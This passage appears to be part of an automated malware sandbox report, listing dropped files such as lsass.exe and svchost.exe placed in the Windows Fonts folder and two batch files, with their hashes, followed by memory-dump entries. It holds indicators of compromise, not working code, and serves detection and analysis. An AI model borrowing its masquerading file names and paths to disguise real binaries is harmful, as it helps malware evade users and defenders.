SHA12d9cfd9bfe69e7daf9a695df48467d20904157d6
SHA256d92cfffbd3060aa141eab23a8792aa05a0494a6323f92d10d457a8f89eab62c2
SHA5121d65f219dad3fa0762019565300430234e690c8b4b74a941dd82785c75fd70945b1db94684af7aa0238f5d76b4c6ff0195d4f94ad34818868f86f01c1cbe4068
-
\??\c:\windows\Fonts\lsass.exeFilesize
1.4MB
MD5ec0bc41f1e623de85d1be23c55cc5dd8
SHA1d1912bc5d7180b89af68fc7996a943df90b4106a
SHA2560b7585b424e77d63186607a4b1e81d65849ce62e3bd6efd52f2b822378549981
SHA512ea7aaf463a9fc6d28d116516f7c1f36c814f50dcd35779ae8b897155ef6c17dec25b4a2a0a05a8a518e32f2632fda8821c080b8fe2e27ee7613dcff07c15ed8e
-
\??\c:\windows\Fonts\svchost.exeFilesize
87KB
MD5f3562c44fc322b78460772ec663b5d78
SHA1cf5816f1a80a61b5a890232235441b424ab8ffff
SHA25650ea41363822717453325f8e21f8fcfb34a35c5f2eeda2ee38bba7f43ec205bd
SHA512cc0f202f217aec581c1df6de1ec8ed01d5fb0884c840cfb29665ec952abb61100effec48ec99fa0782763a726653d5d3b2ae09ed672c04e50205a8966a5aa94c
-
\??\c:\windows\hosts.batFilesize
4KB
MD59459b1d319aab5c7773a1b24e3a25346
SHA1efbd37a1b9fe93aa8b0ae23dba0999fc5437447c
SHA256c21313ed87306ff6d0db8c0ef18fd89607fb068dcd4a82dcbd580b772dfe0663
SHA512609988a8eb4d64951f5ea60083faf6fb4ac3063f6bfce780cab832c59219433bcd231262c4d4bcf7dac8e3860b2189ae71607dd1377bf98b65f75d1dcbc359e3
-
\??\c:\windows\hosts1.batFilesize
4KB
MD5a98a5e1a59b4b05a4769924dfa541c53
SHA1f5e4fe1c2959ca656fe76547bc600aedace2e02e
SHA256cc5ec7687541b94eb3d3ebf025b07006aec46763f01c4428c30232bea51f562c
SHA512189cf76f85a2178e8e58a15bf8e7f7668dc07e77da04e068a3fbc59acad59136fec8bf7caccb247659a5d6d44738e829e1d439d7dedd18659bc9f08ddb5874f0
-
memory/396-173-0x0000000000000000-mapping.dmp
-
memory/828-169-0x0000000000000000-mapping.dmp
-
memory/872-205-0x0000000000000000-mapping.dmp
-
memory/920-164-0x0000000000000000-mapping.dmp
-
memory/1132-197-0x0000000000000000-mapping.dmp
-
memory/1132-229-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/1132-226-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/1176-183-0x0000000000000000-mapping.dmp
-
memory/1184-198-0x0000000000000000-mapping.dmp
-
memory/1484-196-0x0000000000000000-mapping.dmp
-
memory/1492-139-0x0000000000000000-mapping.dmp
-
memory/1512-137-0x0000000000000000-mapping.dmp
-
memory/1592-206-0x0000000000000000-mapping.dmp
-
memory/1732-174-0x0000000000000000-mapping.dmp
-
memory/1732-188-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/1732-207-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/1812-149-0x0000000000000000-mapping.dmp
-
memory/1824-187-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/1824-171-0x0000000000000000-mapping.dmp
-
memory/1824-195-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/1844-222-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/1916-160-0x0000000000000000-mapping.dmp
-
memory/1924-170-0x0000000000000000-mapping.dmp
-
memory/1976-179-0x0000000000000000-mapping.dmp
-
memory/1984-159-0x0000000000000000-mapping.dmp
-
memory/2088-180-0x0000000000000000-mapping.dmp
-
memory/2088-190-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/2088-225-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/2120-202-0x0000000000000000-mapping.dmp
-
memory/2156-138-0x0000000000000000-mapping.dmp
-
memory/2240-167-0x0000000000000000-mapping.dmp
-
memory/2264-162-0x0000000000000000-mapping.dmp
-
memory/2444-209-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/2444-189-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/2444-176-0x0000000000000000-mapping.dmp
-
memory/2476-141-0x0000000000000000-mapping.dmp
-
memory/2560-194-0x0000000000000000-mapping.dmp
-
memory/2608-157-0x0000000000000000-mapping.dmp
-
memory/2700-152-0x0000000000000000-mapping.dmp
-
memory/2784-200-0x0000000000000000-mapping.dmp
-
memory/2832-166-0x0000000000000000-mapping.dmp
-
memory/3024-145-0x0000000000000000-mapping.dmp
-
memory/3104-227-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/3116-155-0x0000000000000000-mapping.dmp
-
memory/3160-182-0x0000000000000000-mapping.dmp
-
memory/3388-151-0x0000000000000000-mapping.dmp
-
memory/3476-150-0x0000000000000000-mapping.dmp
-
memory/3604-201-0x0000000000000000-mapping.dmp
-
memory/3636-148-0x0000000000000000-mapping.dmp
-
memory/3684-219-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/3728-153-0x0000000000000000-mapping.dmp
-
memory/3776-161-0x0000000000000000-mapping.dmp
-
memory/3836-168-0x0000000000000000-mapping.dmp
-
memory/3852-163-0x0000000000000000-mapping.dmp
-
memory/4000-165-0x0000000000000000-mapping.dmp
-
memory/4064-185-0x0000000000000000-mapping.dmp
-
memory/4120-228-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/4120-210-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/4168-133-0x0000000000000000-mapping.dmp
-
memory/4172-204-0x0000000000000000-mapping.dmp
-
memory/4232-131-0x0000000000000000-mapping.dmp
-
memory/4236-147-0x0000000000000000-mapping.dmp
-
memory/4244-132-0x0000000000000000-mapping.dmp
-
memory/4288-130-0x0000000000400000-0x0000000000656000-memory.dmpFilesize
2.3MB
-
memory/4504-134-0x0000000000000000-mapping.dmp
-
memory/4512-144-0x0000000000000000-mapping.dmp
-
memory/4524-193-0x0000000000000000-mapping.dmp
-
memory/4524-136-0x0000000000000000-mapping.dmp
-
memory/4640-203-0x0000000000000000-mapping.dmp
-
memory/4656-146-0x0000000000000000-mapping.dmp
-
memory/4680-140-0x0000000000000000-mapping.dmp
-
memory/4764-143-0x0000000000000000-mapping.dmp
-
memory/4796-158-0x0000000000000000-mapping.dmp
-
memory/4816-172-0x0000000000000000-mapping.dmp
-
memory/4828-154-0x0000000000000000-mapping.dmp
-
memory/4852-199-0x0000000000000000-mapping.dmp
-
memory/4860-135-0x0000000000000000-mapping.dmp
-
memory/5020-178-0x0000000000000000-mapping.dmp
-
memory/5028-156-0x0000000000000000-mapping.dmp
-
memory/5064-142-0x0000000000000000-mapping.dmp
-
memory/5092-220-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB
-
memory/5092-218-0x0000000140000000-0x0000000140053000-memory.dmpFilesize
332KB